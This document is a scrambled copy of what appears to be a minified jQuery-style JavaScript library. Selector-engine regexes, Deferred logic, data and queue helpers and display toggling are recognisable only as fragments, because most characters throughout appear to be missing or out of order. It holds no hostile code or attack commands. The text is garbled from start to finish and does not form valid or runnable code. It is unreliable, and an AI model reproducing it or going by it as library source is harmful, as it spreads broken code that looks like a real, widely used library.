,,,,,,,,,,,,,,,,,,,=szl\"1nwDt,=.ouetT0C0Ea(,=e)Sa(,=ucinet{eune=t&f!)0,=}hswPoet,=]jAppqAps,=.uhHAsieOfnto(,)frvrn0relnt;<;+)fen==)eunnrtr-}P\"hce|eetdaycatfcsatpa|otosdfrdsbe|idnimplo|utpeoe|ednyrqie|cpd,=[\\2\\t\\\\n\\],=(:\\\\|\\w][\\-\\a]+,=\\[++*\"R\"(:++*[^|~?)++*?'(:\\\\|^\\\\]*'\\(?\\\\.[\\\\\\]*\\|\"R\"))++*\\\"W\"(++)?\\(((?\\\\.[\\\\'))|\"(:\\\\|^\\\\\"))\"|(:\\\\|^\\\\)\\]|++)).)\\|\"$nwRgx(++,g)BnwRgx(^+++(?^[\\\\](:\\\\))+++\"\"\",=e eEp\"\"M\",++*)_nwRgx(^++*[+]\"M\"\"M\"\",=e eEp\"\"M\"(^\\'\"*)++*\\\"\"\",=e eEpW,=e eEp\"\"R\"\",=I:e eEp\"#\"R\"\",LS:e eEp\"\\.\"R\"\",A:e eEp\"(++|*))AT:e eEp\"\"I,SUOnwRgx(^+)CIDnwRgx(^(nyfrtls|t|t-at-cido-ye(:\\\"M\"(vnod([-|(\\*n)++*?(+])++*\\d))\"M\"\\)),i)bo:e eEp\"(:++)\"\"\",edCnetnwRgx(^++*>~|(vnode|tl|t|is|at(:\\\"M\"(?-\\)\\d)++*\\|(=^]$\"\"\"}G/(:nu|eettxae|utn$iY/hd/,=^^]\\\\*[aie\\/J/(:(\\-+|\\+|.[w])$,=[~/ZnwRgx(\\\\(\\d-]16\"M\"|\"M\"|),i\",efnto(,,)vrr\"x+-53;eunr=r|?:<?tigfoCaCd(+53)Srn.rmhroer>052612&|62),e/[0\\1\\7]^?d|-|^0\\1\\7-uFFw]gn=ucinet{eunt\"0==?\\ff\"esie0-)\"\\+.hroetelnt-)tSrn(6+ :\\\"e,efnto({(}i=efnto()rtr!==.iald&\"omi |\"ae\"ne}{i:prnNd\"nx:lgn\")tyLapyAHcl(.hlNds,.hlNds,[.hlNdslnt]ndTp}ac()L{pl:.eghfnto(,)qapyeHcl()}fnto(,)vrnelnt,=;hl([+]tr+)elnt=-}}ucino(,,,)vroslcfhvmt&.weDcmn,=?.oeye9i(=|[,srn\"=yefe|e|!=&9=T&1=Trtr ;f!&(ttonrouet|:)=d&()tt|,){f1!=&(=.xce)i(=[]{f9=T{f!ltgtlmnBI())eunri(.d=ortr .uhl,}lei(&(=.eEeetydo)&(,)&.d=ortr .uhl,}lei([]rtr .pl(,.eEeetBTgaee)ri(of3)&.eEeetBCasae&.eEeetBCasaertr .pl(,.eEeetBCasaeo)ri(.s&![+ ]&!|!.ete){f1=Tmtvees f\"bet!=.oeaetLwrae){ctgttrbt(i\")ccrpaet,e:.eAtiue\"d,=)s(=().eghwies-hs=#++ +ehs)vhji(,)mKts()&etprnNd)|}fvtyrtr .pl(,.urSlcoAlv)rcthe{fnlyc=b&.eoetrbt(i\"}}eunuerpaeB\"1)tri}ucina({a =]fnto (,)rtr .uhn\"\">.ahLnt&dlt [.hf(]tn\"\"=}euntfnto ee{euneb=0efnto ee{a =.raelmn(fede\";r{eun!()cthe{eun1fnlytprnNd&tprnNd.eoehl()tnl}fnto eet{a =.pi(|)inlnt;hl(-).tradeni]tfnto eet{a =&ern&==.oeye&==.oeye&.orene-.orene;frrtr ;fnwiennnxSbigi(==)eun1rtr ?:1fnto ee{eunfnto()rtr\"nu\"=tndNm.ooeCs(&ttp==}fnto ee{eunfnto()vrntndNm.ooeCs(;eun\"nu\"=n|bto\"=n&ttp==}fnto ee{eunfnto()rtr\"omi ?.aetoe&1=tdsbe?lbli ?lbli .aetoetprnNd.iald=etdsbe==:.siald=e|.siald=!&i()=etdsbe==:lbli &tdsbe==}fnto ee{euns(ucint{eunt+,efnto(,)vrioe[,.eght,=.eghwiea-nioa]&ni=([]ni)}}}ucing()rtr &\"neie\"=yefegtlmnsyaNm&eno.upr=}oo.sM=ucine{a =&(.weDcmn|e.ouetlmn;eun!&\"TL!=.oeae,=estouetfnto()vrtiaeeonrouet|:;euna=d&==.oeye&.ouetlmn?dahddcmnEeetg!()w=d&iddfutiw&itp=i&iadvnLsee?.dEetitnr\"nod,e!)iatcEet&.tahvn(oula\"r),.trbtsu(ucine{eunecasae\"\"!.eAtiue\"lsNm\"},.eEeetBTgaeu(ucine{euneapnCiddcetCmet\"),egtlmnsyaNm(*)lnt},.eEeetBCasaeQts(.eEeetBCasae,.eBI=efnto()rtr .pedhl()i=,dgtlmnsyae|dgtlmnsyaeb.egh)ngtyd(.itrI=ucine{a =.elc(,e;eunfnto()rtr .eAtiue\"d)=t}rfn.Dfnto(,)i(udfnd!tpo .eEeetyd&)vrntgtlmnBI()rtr ?n:]}:rfle.Dfnto()vrterpaeZe)rtr ucine{a =udfnd!tpo .eAtiueoe&.eAtiueoe\"d)rtr &nvle=t}rfn.Dfnto(,)i(udfnd!tpo .eEeetyd&)vrnriotgtlmnBI()i()i(nogttrbtNd(i\")&.au==)euno;=.eEeetBNm()r0wieoir+)f(=.eAtiueoe\"d)&nvle=ertr[]rtr[})rfn.A=.eEeetBTgaefnto(,)rtr\"neie\"=yeftgtlmnsyaNm?.eEeetBTgaee:.s?.urSlcoAle:od0:ucinet{a ,=]i0otgtlmnsyaNm()i(*==)wienoi+)==.oeye&.uhn;eunrrtr }rfn.LS=.eEeetBCasae&ucinet{f\"neie\"=yeftgtlmnsylsNm&grtr .eEeetBCasaee}v[,=](.s=.etdqeyeetrl)&(efnto()hapnCide.neHM=< d'++'<a<eeti=\"b\"\\\\'malwatr='<pinslce='<oto>/eet\"eqeyeetrl([slocpue='\".egh&.uh\"*$=++*?'|\"\"\",.urSlcoAl\"slce])lnt|yps(\\[++*?vle\"P\"\",.urSlcoAl\"i~\"b\"])lnt|yps(~\",.urSlcoAl\"cekd)lnt|yps(:hce\",.urSlcoAl\"#+++\".egh|.uh\"#++]))u(ucine{.neHM=< rf' iald'iald>/>slc iald'iald>oto/<slc>;a =.raelmn(ipt)tsttrbt(tp\"\"idn)eapnCidt.eAtiue\"ae,D)eqeyeetrl([aed\".egh&.uh\"ae++**$!]=)2=eqeyeetrl(:nbe\".egh&.uh\"eald,:iald)hapnCide.iald!,!=.urSlcoAl\"dsbe\".egh&.uh\"eald,:iald)eqeyeetrl(*:\",.uh\".:)),nmthseetrQts(=.ace|hwbiMthseetr|.oMthseetr|.Mthseetr|.saceSlco)&u(ucine{.icnetdac=.ale\"\",.ale\"s=':\",.uh\"=,))yylnt&nwRgx(.on\"\")vvlnt&nwRgx(.on\"\")tQts(.oprDcmnPsto)xt|.ethcnan)fnto(,)vrn9=endTp?.ouetlmn:,=&tprnNd;eune=r|(r|!=.oeye|(.otisncnan()ecmaeouetoiin&6ecmaeouetoiinr)}fnto(,)i()hl(=.aetoei(==)eun0rtr!}Dtfnto(,)i(==)eunf!,;a =ecmaeouetoiin!.oprDcmnPsto;eunr|1(=eonrouet|)=(.weDcmn|t?.oprDcmnPsto()1|!.oteahd&.oprDcmnPsto()=re=d|.weDcmn==&xwe?1t=d|.weDcmn==&xwt?:?(,)Oct::&?11}fnto(,)i(==)eunf!,;a ,=,=.aetoeotprnNd,=e,=t;f!|!)eune=d-:==?:?1o1cOce-(,)0i(==)eunc(,)newiennprnNd).nhf()ntwiennprnNd).nhf()wiear==[]r+rtr ?ear,[]:[]=w-:[]=w10,)d,emthsfnto(,)rtr eenl,ult}o.aceSlco=ucinet{f(.weDcmn|e!=&pe,=.elc(,=$'\",.aceSlco&g&St\"\"&(v|vts()&(y|yts())r{a =.alet;fr|.icnetdac|edcmn&1!=.ouetndTp)eunrcthe{rtr etdnl,e)lnt>}o.otisfnto(,)rtr(.weDcmn|e!=&pe,(,),eat=ucinet{eonrouet|)=d&()vriratHnl[.ooeCs(]oi&.alratHnl,.ooeCs()iet!)vi ;eunvi !=?:.trbts|gegttrbt()(=.eAtiueoet)&.pcfe?.au:ul,eecp=ucine{eune\")rpaet,e}o.ro=ucine{ho e ro(Sna ro,urcgie xrsin +),euiuSr=ucine{a ,=]i0o0i(=ndtcDpiae,=nsrSal&esie0,.otD,)wieteo+)==[]&irps();hl(-).pieri,)rtr =ule,=egtetfnto()vrtn\",=,=.oeyei()i(==|9=o|1=o{f\"tig=tpo .etotn)eunetxCnetfreefrthl;;=.etiln)+ie}lei(==|4=ortr .oeau}lewieter+)+it;eunn,ro.eetr=cceegh5,raesuos,ac:,trade{,id{,eaie{>:dr\"aetoe,is:0, :dr\"aetoe}\"\"{i:peiuSbig,is:0,~:dr\"rvosiln\"}peitr{TRfnto()rtr []e1.elc(,e,[]([]|[]|[]|\".elc(,e,~\"=e2&([]\"\"e3+ )esie04}CIDfnto()rtr []e1.ooeCs(,nh==[]sie03?e3|o.ro([],[]+e4?[]([]|)2(ee\"=e3|\"d\"=e3),[]+e7+[]|od==[])e3&o.ro([],}PED:ucine{a ,=e6&e2;eunVCIDts([]?ul([]e2=[]|[]|\"n&.etn&(=(,0)&tnidxf\"\"nlnt-)nlnt)&e0=[]sie0t,[]nsie0t)esie03)}fle:TGfnto()vrterpaeZe)tLwrae)rtr\"\"=efnto({eun0:ucine{eunendNm&endNm.ooeCs(==},LS:ucine{a =[+ ]rtr |(=e eEp\"^\"M\"\"e\"\"M\"$\")&(,ucine{euntts(srn\"=yefecasae&.lsNm|\"neie\"=yefegttrbt&egttrbt(cas)|\"}}AT:ucinetn{eunfnto()vrio.trre;eunnl=i\"===:t|i=\"\"\"=ti=n\"===?!=:^\"=tn&==.neO()\"===?&iidxfn>1\"===?&isie-.egh==:~\"=t( +.elc(, )\"\".neO()-:|\"=t&i=n|.lc(,.egh1==+-)},HL:ucinetnri{a =nh!=.lc(,)a\"at!=.lc(4,=o-ye==;eun1=r&==?ucine{eun!.aetoe:ucintnu{a ,,,,,,=!=?nxSbig:peiuSbig,=.aetoevs&.oeaetLwrae)m!&!,=1i()i()wieg{=;hl(=[]i(?.oeaetLwrae)=v1=pndTp)eun1hg\"ny==&!&\"etiln\"rtr!}fh[?.isCidylsCid,&m{=d(=c(=py[]|pb=})puiuI]|fpuiuI]{)[]|][]=T&[]&l2,=&ycidoe[]wiep+d&&pg|(==)|.o()f1=pndTp&+x&==)ce=Tdx;ra}es fm&xd(=c(=pt[]|pb=})puiuI]|fpuiuI]{)[]|][]=T&[],1=xwiep+d&&pg|(==)|.o()f(?.oeaetLwrae)=v1=pndTp)&+&(&(c(=[]|pb=})puiuI]|fpuiuI]{)[][,],==)bekrtr(-i==|xr=&xr=}}PED:ucinet{a ,=.suo[]|.eFlesetLwrae)|o.ro(uspotdped:\"e;eunib?()ilnt>?n[,,\"t,.eFleshswPoet(.ooeCs()s(ucinen{a ,=(,)aolnt;hl(-)[=(,[]]!nr=[]}:ucine{eunie0n}:},suo:nts(ucine{a =]n[,=(.elc(,$\")rtr []s(ucinetni{a ,=(,uli[)selnt;hl(-)oas)&es=([]o))fnto(,,)rtr []ertnl,,)t0=ul!.o(})hss(ucine{eunfnto()rtr eet.egh0},otiss(ucine{euneerpaeZe)fnto()rtr(.etotn|tinret|().neO()-})ln:efnto()rtr .ete|\"|o.ro(uspotdln:\"e,=.elc(,e.ooeCs(,ucint{a ;oi(=?.agtgttrbt(xlln\"|tgttrbt(ln\")eunnntLwrae)==|0=nidxfe\"\"}hl(ttprnNd)&==.oeye;eun1},agtfnto()vrnelcto&elcto.ahrtr &nsie1==.d,otfnto()rtr ==}fcsfnto()rtr ==.cielmn&(dhsou|dhsou()&!etp|ehe|~.aIdx}ealdd(1,ialdd(0,hce:ucine{a =.oeaetLwrae)rtr\"nu\"=t&!.hce|\"pin==&!eslce}slce:ucine{euneprnNd&eprnNd.eetdne,0=eslce}epyfnto()freefrthl;;=.etiln)fendTp<)eun1rtr!}prn:ucine{eunrpedsepye}hae:ucine{eunYts(.oeae}iptfnto()rtr .etendNm),utnfnto()vrtendNm.ooeCs(;eunipt==&\"utn==.ye|bto\"=t,etfnto()vrtrtr\"nu\"=endNm.ooeCs(&\"et==.ye&nl=(=.eAtiue\"ye)|\"et==.ooeCs(),is:efnto({eun0},ath(ucinet{eunt1},qh(ucinetn{eunn0ntn},vnh(ucinet{o(a =;<;+2eps()rtr },d:efnto(,)frvrn1ntn=).uhn;eune)l:efnto(,,)frvrrn0ntn-r=;eps()rtr },th(ucinetn{o(a =<?+:;+<;eps()rtr }})pedsnhrpedse;o( nrdo!,hcbx!,ie!,asod!,mg:0).suo[]f()frti{umt!,ee:0).suo[]p()fnto e)}epooyerflesrpedsrstitr=e eao.oeiefnto(,)vrnioasulcke\"\";fcrtr ?:.lc()seu[,=.rFle;hl()n&(=.xcs)|i&sssiei0.egh|s,.uho[),=1(=.xcs)&nisit)ops(vlentp:[]rpaeB\"\"},=.lc(.egh)frai .itr!iVa.xcs)|[]&(=[]i)|nisit)ops(vlentp:,ace:},=.lc(.egh)i(nbekrtr ?.eghso.ro()keu.lc();ucinv()frvrt0nelnt,=\"tnt+r=[]vlertr }ucinm(,,)vrrtdritnx,=|ran&prnNd\"=osC+rtr .is?ucintni{hl(=[]i(==.oeye|)eunetni;eun1:ucintnu{a ,,,=Ts;fu{hl(=[]i(1=tndTp|a&etnu)eun0es hl(=[]i(==.oeye|)fftb|([]{)cftuiuI]|ftuiuI]{)i&==.oeaetLwrae)ttr|tes{f(=[]&l0==&l1==)eunp2=[]i([]pp2=(,,)rtr!}eun1}ucinx()rtr .egh1fnto(,,)vrielnt;hl(-)f![]tnr)eun1rtr!}e0}ucinb(,,)frvrr0itlnt;<;+)eetr,)rtr }ucinw(,,,,)frvroa[,=,=.eghlnl!tsus+(=[]&(&!(,,)|aps()l&.uhs);eunafnto eetnrio{eunr&rb&(=er)i&ib&(=eio)s(ucinoasu{a ,,,=]d[,=.eghgo|et|*,.oeye[]s[)y!|!&tgw(,,,,)vni|oeh|)[::;fn&(,,,)r{=evd,(,]su,=.eghwiec-(=[]&([[]=([[]=)}fo{fi|)i()l[,=.eghwiec-(=[]&lps([]f;(ulv[,,)cvlnt;hl(-)fvc)&liOof:[]>1&ol=([]f)}levw(==?.piehvlnt)v,?(ulavu:.pl(,))fnto ee{o(a ,,,=.egharrltv[[]tp]sa|.eaie\"\",=?:,=efnto()rtr ==}s!)fm(ucine{eunOte>1,,0,=fnto(,,)vri!&(|n=l|(tn.oeyecenr:(,,);euntnl,};<;+)fnrrltv[[]tp]p[ex()n]es{f(=.itreu.ye.pl(uleu.ace)[]{o(=+;<;+)frrltv[[]tp]bekrtr eu1&ep,>&v(.lc(,-)cna(vle\"\"=eu2.ye\"\"\"})rpaeB\"1)nui&eesieui)io&eeesiei)io&ee)pps()rtr ep}ucinE(,)vrntlnt>,=.egh0ofnto(,,,,)vrfhyv0m\"\"xo&]b[,=,=|i&.idTG\"\"c,=+nl=w1Mt.adm)|1kClnt;o(&(===|a|)m=k&ul=fCm)m+{fi&)h0a|.weDcmn==|(()s!)wieyeh+)fyfa|,){.uhf;ra}&(=)n&(=y&)&-,&xps()}fv=,&m=v{=;hl(=[+]yxbas;fo{fv0wiem-xm|bm|([]jcl();=eb}.pl(,)c&o&.egh0&+.egh1&euiuSr()rtr &(=,=)x;eunns()ortr =ecmiefnto(,)vrnr[,=]oSe\"\";f!)t|tae)ntlnt;hl(-)oC([])b?.uho:.uho;oSeE(,))slco=}euno,=eslc=ucinetni{a ,,,,,=fnto\"=yefe&,=i&(=.eetr|)i(=|[,==.egh{f(=[]d0.lc().egh2&I\"=(=[].ye&==.oeye&&rrltv[[]tp]{f!t(.idI(.ace[]rpaeZe)t|[)0)rtr ;&(=.aetoe,=.lc(.hf(.au.egh}=.edCnetts()0ulnt;hl(-)i(=[]rrltv[=.ye)ra;f(=.idc)&iflmths0.elc(,e,.etu0.ye&g(.aetoe|t){fuslc(,)!eilnt&v())eunLapyni,;ra}}eunp|(,)(,,gn!|Kts()&etprnNd)|)n,.ottbebslt\")sr()ji(\"==,.eetulcts!fp)nsrDtce=efnto()rtr &.oprDcmnPsto(.raelmn(fede\"))u(ucine{euneinrTL\"ahe=#>/>,#==.isCidgttrbt(he\"}|l(tp|rfhih|it\"fnto(,,)i(nrtr .eAtiuet\"ye==.ooeCs(?:))natiue&u(ucine{euneinrTL\"ipt>,.isCidsttrbt(vle,\",\"=efrthl.eAtiue\"au\"}|l(vle,ucinetn{f!&\"nu\"=endNm.ooeCs()eunedfutau},efnto()rtr ul=.eAtiue\"iald))|ePfnto(,,)vrri(nrtr!==[]ttLwrae)(=.eAtiueoet)&.pcfe?.au:ul)o}e;.idEwep=.eetr,.xr\"\"=.xrpedswuiuSr=.nqeEuiuSr,.etEgtetwiXLo=.sM,.otisEcnan,.saeeetrEecp;a =ucinetn{a =]ivi !=;hl(eet)&!=.oeyei(==.oeye{fi&()i()bekrps()rtr }Sfnto(,)frvrn[;;=.etiln)==.oeye&!=&nps()rtr }Dwep.ac.edCnetfnto (,)rtr .oeae&.oeaetLwrae)=ttLwrae)vrA/<[-]^/0:x0trnf*[x0trnf*/>?</1|$ifnto (,,)rtr ()wge(,uciner{eun!.alere!=}:.oeyewge(,ucine{eune=t=n)\"tig!tpo ?.rpefnto()rtr .alte>1=n)wfle(,,)wfle=ucinetn{a =[]rtr &(=:o(++))1=tlnt&1=rndTp?.idmthseetrre?r:]wfn.ace(,.rptfnto()rtr ==.oeye)}wf.xed{idfnto()vrtnrti.eghiti;f\"tig!tpo )eunti.uhtc(()fle(ucin)frt0trt+i(.otisit,hs)eun0);o(=hspsSak[)t0trt+wfn(,[]n;eunr1wuiuSr()n,itrfnto()rtr hspsSakjti,|[,1),o:ucine{eunti.uhtc((hse|]!)}i:ucine{eun!(hs\"tig=tpo &Dts()we:|[,1.egh};a ,=^?\\*<\\\\]>[>*#[w])$;wf.ntfnto(,,)vrioi(ertr hsi(=|q\"tig=tpo )i((=<==[]&>==[.egh1&elnt>3[ulenl]Lee()|![]&)eunt|.qey(|n.ide:hscntutrt.ide;fi1)i(= ntnefwt0:,.eg(hswpreTLi1,&tndTp?.weDcmn|tr!),.eti1)&.sliOjc()frii )(hsi)ti[]ti)ti.triti)rtr hsrtr(=.eEeetydi2)&(hs0=,hslnt=)ti}eunendTp?ti[]eti.egh1ti)ge?od0=nraynraye:()wmkAryeti))pooyewf,=()vrH/(:aet|rv?UtlAl),=cide:0cnet:0nx:0pe:0;.netn(hsfnto()vrtweti)ntlnt;eunti.itrfnto({o(a =;<;+)fwcnan(hste)rtr!}}coetfnto(,)vrnr0iti.egho[,=srn\"=yefe&()i(Dts()fr;<;+)o(=hsr;&n=tnnprnNd)fnndTp<1&aaidxn>11=nndTp&wfn.aceSlco(,))ops()bekrtr hspsSakolnt>?.nqeoto:),ne:ucine{eune\"tig=tpo ?.alwe,hs0)ucl(hsejur?[]e:hs0&ti[]prnNd?hsfrt)peAl)lnt:1,d:ucinet{eunti.uhtc(.nqeotwmreti.e(,(,))}adakfnto()rtr hsadnl=eti.rvbetti.rvbetfle()})fnto (,)wie(=[]&1=endTp)rtr }.ah{aetfnto()vrteprnNd;eunt&1=tndTp?:ul,aet:ucine{eunke\"aetoe),aetUtlfnto(,,)rtr (,prnNd\"n}nx:ucine{eunPe\"etiln\"}pe:ucine{eunPe\"rvosiln\"}nxAlfnto()rtr (,nxSbig),rvl:ucine{eunke\"rvosiln\"}nxUtlfnto(,,)rtr (,nxSbig,),rvni:ucinetn{eunke\"rvosiln\"n}sbig:ucine{eunS(.aetoe|}.isCide}cide:ucine{eunSefrthl),otnsfnto()rtr (,irm\"?.otnDcmn:Ne\"epae)&eecnet|)wmre[,.hlNds)}fnto(,)wf[]fnto(,)vriwmpti,,)rtr\"ni\"=esie-)&rn,&\"tig=tpo &(=.itrri)ti.egh1&Oe|wuiuSr()Hts()&.ees()ti.uhtc()};a =[\\2\\\\\\\\]/;ucinRe{a =}rtr .ahemthM|[,ucinen{[]!},}.alak=ucine{=srn\"=yefeRe:.xed{,)vrtnrio[,=]s-,=ucin)frii|.nert!;.eghs-)nasit)wie+solnt)1=os.pl([]n1)&.tpnas&(=.eghn!)emmr|(=1,=1i&on[:\"}l{d:ucin)rtr &(&!&(=.egh1aps(),ucintn{.ahnfnto(,)gr?.nqe&.a()|.uhr:&rlnt&\"tig!=()&())(ruet)n&t&()ti}rmv:ucin)rtr .ahagmnsfnto(,)vrnwie(=.nra(,,)>1oslc(,)n=&s-)ti}hsfnto()rtr ?.nra(,)-:.egh0,mt:ucin)rtr &(=],hs,ial:ucin)rtr ==]on\",hs,ialdfnto({euno,okfnto({eunia[,|t|on\")ti}lce:ucin)rtr!i,ieihfnto(,)rtr |(=e(=|[)siensie)n,.uhn,|u),hs,iefnto({eunlfrWt(hsagmns,hs,ie:ucin)rtr!r}rtr }fnto ()rtr }ucinWe{ho }ucin$etnr{a ;r{&giepoie?.ale.oet.aln:&giete)icl(,,)tapyvi ,e.lc()}ac()napyvi ,e)}.xed{eerdfnto()vrn[\"oiy,pors\"wClbcs\"eoy)wClbcs\"eoy)2,\"eov\"\"oe,.alak(oc eoy)wClbcs\"nemmr\",,rsle\",\"eet,fi\"wClbcs\"nemmr\",.alak(oc eoy)1\"eetd],=pnig,=saefnto({eunr,lasfnto({eunodn(ruet)fi(ruet)ti}\"ac\"fnto()rtr .hnnl,),iefnto({a =ruet;eunwDfre(ucint{.ahnfnto(,)vriger4]&er4]or1]fnto({a =&iapyti,ruet)e&(.rms)epoie)pors(.oiy.oetrsle.altrjc)tr0+Wt\"(hsi[]agmns}},=ul)poie),hnfnto(,,)vro0fnto (,,,)rtr ucin)vrsti,=ruet,=ucin)vreli((<){f(=.pl(,)==.rms()ho e yero(Teal efrslto\";=&(ojc\"=yefe|fnto\"=yefe&ete,()ilcl(,(,,,)aonWi)(+,.aleaonIi,(,,,)aonInntfWt))(!=&(=od0u[],i|.eovWt)su)}cilfnto({r{(}ac()wDfre.xetoHo&wDfre.xetoHo(,.tcTae,+>o&r=W&svi ,=e)nrjcWt(,)};?(:wDfre.eSakok&csakrc=.eerdgttcHo()estieu()}rtr .eerdfnto()n0[]ada0egi?:,.oiyih)n1[]ada0egt?:),[]3.d((,,()rW))poie),rms:ucine{eunnl!ewetn(,)i}o{;eunwec(,ucinet{a =[]st5;[[]=.d,&aadfnto({=}n3e[]dsben3e[]dsben0[]lc,[]3.ok,.d([]fr)ot0]fnto({eunot0+Wt\"(hs=ovi :hsagmns,hs,[[]\"ih]afrWt},.rms()t&.aloo,}we:ucine{a =ruet.eghntrAryn,=.alagmns,=.eerd)sfnto()rtr ucinn{[]ti,[]agmnslnt>?.alagmns:,-|arsleihri};ft=&((,.oesn)rslearjc,t,pnig==.tt(|gin&in.hn)rtr .hn)wien-$in,()arjc)rtr .rms(})vrB/(vlItra|ag|eeec|ytxTp|R)ro$;.eerdecpinokfnto(,)ecnoe&.osl.an&&Bts(.ae&ecnoewr(jur.eerdecpin +.esg,.tc,),.edEcpinfnto()estieu(ucin)trwt);a =.eerd)wf.ed=ucine{eunFte()\"ac\"(ucine{.edEcpine},hs,.xed{sed:1rayat1rayfnto()(0=e-wrayatwiRay|(.sed=0!!=&-wrayat0|.eovWt(,w)})wrayte=.hnfnto ({.eoevnLsee(DMotnLae\"_,.eoevnLsee(la\"_,.ed(}cmlt\"=rraytt|\"odn\"=rraytt&!.ouetlmn.ocolestieu(.ed)(.dEetitnr\"OCnetodd,)eadvnLsee(la\"_)vrzfnto(,,,,,,)vrs0uelnt,=ul=;f\"bet==(){=0frsi )(,,,[]!,,)es fvi !=&(=0gr|(=0,&(?tcl(,)tnl)(=,=ucinetn{eunlcl(()n})t)o(sus+tes,,?:.ales,,([]n);eunieltcl()ute0,)o,=^m-,=-[-]/;ucinVet{eunttUprae)fnto ()rtr .elc(,m-)rpaeUV}a =ucine{eun1=endTp|9=endTp|!endTp}fnto ({hsepnowepnoQud+Qud1Qpooye{ah:ucine{a =[hsepno;eunt|t{,()&endTp?[hsepno=:betdfnPoet(,hsepno{au:,ofgrbe!}),}stfnto(,,)vrriti.ah()i(srn\"=yeftiGt]nes o( ntiGr]tr;euni,e:ucinet{eunvi ==?hsccee:[hsepno&eti.xad]Gt],cesfnto(,,)rtr od0=t|&\"tig=tpo &vi ==?hsgtet:ti.e(,,)vi !=?:),eoefnto(,)vrnreti.xad]i(od0=r{fvi !=)n(=ra.sra()tmpG:tGt)nr[]tmthM|[)lnt;hl(-)eeertn](od0=t|.smtOjc()&(.oeyeeti.xad]vi :eeeeti.xad]},aDt:ucine{a =[hsepno;eunvi !=&!.smtOjc()}vrJnwQKnwQZ/(:{\\\\]\\|[\\\\]\\)/e=[-]gfnto ee{euntu\"=e|fle!=&(nl\"=enl:==e\"?eZts()JO.as()e}ucinn(,,)vrri(od0=n&==.oeyei(=dt-+.elc(e\"$\".ooeCs(,srn\"=yefnegttrbt())tynt()cthe{Kstetn}lenvi ;eunnwetn(hsaafnto()rtr .aDt()|.aDt(),aafnto(,,)rtr .cesetn}rmvDt:ucinet{.eoeet}_aafnto(,,)rtr .cesetn}_eoeaafnto(,)Jrmv(,)},.netn(dt:ucinet{a ,,,=hs0,=&oatiue;fvi ==)i(hslnt&(=.e()1=ondTp&!.e(,hsaatr\"){=.eghwien-an&0=(=[]nm)idxf\"aa\"&(=(.lc(),eorir);.e(,hsaatr\"!)rtr }eunojc\"=yefeti.ahfnto({.e(hse}:(hsfnto()vrni(&vi ==)i(od0=(=.e(,))eunni(od0=(=eoe)rtr }leti.ahfnto({.e(hset}}nl,,ruet.egh1nl,0}rmvDt:ucine{eunti.ahfnto({.eoeti,))},.xed{uu:ucinetn{a ;fertr =t|f\"+qee,=.e(,)n&!|AryiAryn?=.cesetwmkAryn)rps(),|[}dqeefnto(,)tt|f\"vrnwqeeet,=.eghinsit)ow_uuHoset,=ucin)wdqeeet}\"nrges==&(=.hf(,-)i&\"x==&nusit\"nrges)dlt .tpicl(,,),r&&oepyfr(}_uuHosfnto(,)vrnt\"uuHos;eunJgten|Jacs(,,epywClbcs\"nemmr\".d(ucin)Jrmv(,t\"uu\"n)))},.netn(qeefnto(,)vrn2rtr\"tig!tpo &(=,=f\"n-,ruet.eghnwqeeti[]e:od0=tti:hsec(ucin)vrnwqeeti,,)w_uuHosti,)\"x==&\"nrges!=[]&.euu(hse}}dqeefnto()rtr hsec(ucin)wdqeeti,)),laQeefnto()rtr hsqeee|f\"[),rms:ucinet{a ,=,=.eerd)oti,=hslnt,=ucin)-r|.eovWt(,o);srn\"=yefe&teevi )ee|f\"wiea-(=.e([]e\"uuHos)&nepy&r+nepyads)rtr (,.rms()};a e/+](:d\\|\\+?[E[-?d|/suc,enwRgx(^?(+]=)\"r+)[-%*$,i)o=\"o\"\"ih\"\"otm,Lf\",efnto(,)rtr\"oe==et|)syedsly|\"=esyedsly&.otiseonrouete&\"oe==.s(,dsly),efnto(,,,)vrioa{;o( ntao=.tl[]esyeo=[]inapyer|];o( ntesyeo=[]rtr }fnto eetnr{a ,,=0srfnto({eunrcr):ucin)rtr .s(,,\"}us)ln&[]|wcsubrt?\"\"x)c(.sNme[]|p\"=l&u&i.xcwcset)i(&c3!=)u=,=|c3,=u|;hl(-).tl(,,+)(-)(-os)u|5)=&(=)c=;*2wsyeetcl,=|[}eunn&c+|+|0in1?+n1+)n2:n2,&(.ntlrsatcredi)ivrl=}fnto ee{a ,=.weDcmn,=.oeaeil[]rtr |(=.oyapnCidncetEeetr)iwcst\"ipa\",.aetoermvCidt,nn\"=i&i\"lc\",er=,)fnto eet{o(a ,,=]o0aelnt;<;+)reo)sye&nrsyedslyt(nn\"=n&io=.e(,dsly)|ulio|(.tl.ipa=\")\"==.tl.ipa&a()&io=er):nn\"=n&io=nn\"Jstr\"ipa\"n);o(=;<;+)ul=[]&eo.tl.ipa=[];eunewf.xed{hwfnto({eunf(hs!),iefnto({eunf(hs}tgl:ucine{eunboen=tpo ??hsso(:hshd(:hsec(ucin)a(hs?(hs.hw)wti)hd(}})vrp=^?ceko|ai)/,e/(az[\\\\>x0trnf+/,e/$^oue|/?jv|casrp/,e{pin[,<eetmlil=mlil'\"\"/eet\",ha:1\"tbe\"\"/al>]cl[,<al>clru>,<clru>/al>]t:2\"tbe<bd>,<toy<tbe\",d[,<al>toy<r\"\"/r<toy<tbe\",dfut[,\"\"];eotru=eoto,etoyg.fo=eclru=ecping.ha,et=et;uciny(,)vrnrtr =udfnd!tpo .eEeetBTgaeegtlmnsyaNm(|\"\":udfnd!tpo .urSlcoAleqeyeetrl(|\"\":]vi ==|t&(,)wmre[]n:}ucinv(,)frvrn0relnt;<;+).e([]\"lblvl,t|.e([]\"lblvl)}a e/|#\\+/fnto eetnri{o(a ,,,,,,=.raeouetrget)p[,=,=.eghdhd+i(oed)|==)f\"bet==()wmrepondTp?o:)es fm.eto)aa|.pedhl(.raelmn(dv),=d.xco|[\"\"][]tLwrae)ug[]|e_eal,.neHM=[]whmPeitro+[]cu0;hl(-)=.athl;.eg(,.hlNds,affrthl)txCnet\"}lepps(.raeetoeo)ftxCnet\",=;hl(=[+]i(&wiAryor>1i&.uho;lei(=.otisoonroueto,=efapnCido,srp\",&v()n{=;hl(=[+]h.etotp|\")&.uho}eunf!ucin)vrercetDcmnFamn(.pedhl(.raelmn(dv),=.raelmn(ipt)tsttrbt(tp\"\"ai\",.eAtiue\"hce\"\"hce\",.eAtiue\"ae,t)eapnCidt,.hcCoeecoeoe!)coeoe!)lsCidcekdeinrTL\"txae><txae>,.olnCekd!ecoeoe!)lsCiddfutau})vrb=.ouetlmn,e/ky,e/(:os|one|otxmn|rgdo)cik,e/(^])?\\(+|/fnto e)rtr!}ucink({eun1fnto e)tyrtr 